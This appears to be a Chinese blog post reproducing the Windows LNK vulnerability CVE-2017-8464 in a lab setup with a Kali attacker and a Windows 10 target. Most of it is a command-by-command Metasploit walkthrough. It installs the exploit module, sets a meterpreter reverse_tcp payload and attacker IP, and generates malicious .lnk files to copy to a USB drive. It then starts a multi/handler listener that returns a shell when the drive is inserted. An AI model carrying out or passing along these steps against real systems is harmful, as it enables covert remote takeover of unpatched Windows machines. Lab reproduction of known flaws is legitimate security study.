震网三代cve_2017_8464漏洞复现

影响版本:

 

windows 10

windwos RT 8.1

windows 8.1

windows 7

windows server 2016

windows server 2012 R2

windows server 2012

windows server 2008 R2

windows server 2008

 

以下文章中<   >里的内容为需要输入的代码,输入的代码也会用标记出来

 

攻击机:kali,ip:192.168.83.128

靶机:win10

准备工作:下载最新的zip包,下载完成后将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat下。


2.仅复制rb文件会出错,须再将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits中。

打开metaploit,msfconsole,

<msfconsole>

搜索cve_2017_8464<search cve_2017_8464>

 

 

使用exploit/windows/fileformat/cve_2017_8464_lnk_rce攻击模块

<use exploit/windows/fileformat/cve_2017_8464_lnk_rce>:

 

可以用<show options>查看设置是否成功

然后我们需要加载一个攻击模块,

<set payload windows/meterpreter/reverse_tcp>

中间可以用<ifconfig>查看攻击机的ip

设置攻击机的ip

<set lhost 192.168.83.128>

然后<exploit>运行(run应该也可以)会生成许多lnk文件

现在我们要将这些lnk文件复制到U盘里,这些lnk文件会自动保存到root/.msf4/local/目录下,注意,mf4是隐藏文件

现在,回到kali,使用监听模块,

<use multi/handler>

回车,然后加载一个payload(这里不小心错输入成paylaod居然也成功了)

<set payload windows/meterpreter/reverse_tcp>(以上24个文件其实只需要2个,但是不确定靶机的U盘系统为E盘或是D盘等等,所以直接保留了D到Z共23个文件,例如:如果靶机系统U盘为E盘只需要保留FlashPlayer_E和FlashPlayerCPLApp.cpl就可以)

设置好攻击机的ip(这里我又用ifconfig查看了ip)

<set lhost 192.168.83.128>

然后运行

<exploit>

现在,将U盘插入靶机,如果设置自动播放,在攻击机中会反弹一个meterpreter,如果未设置,在靶机中打开下面标记文件也可以

 

<shell>

拿到shell

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值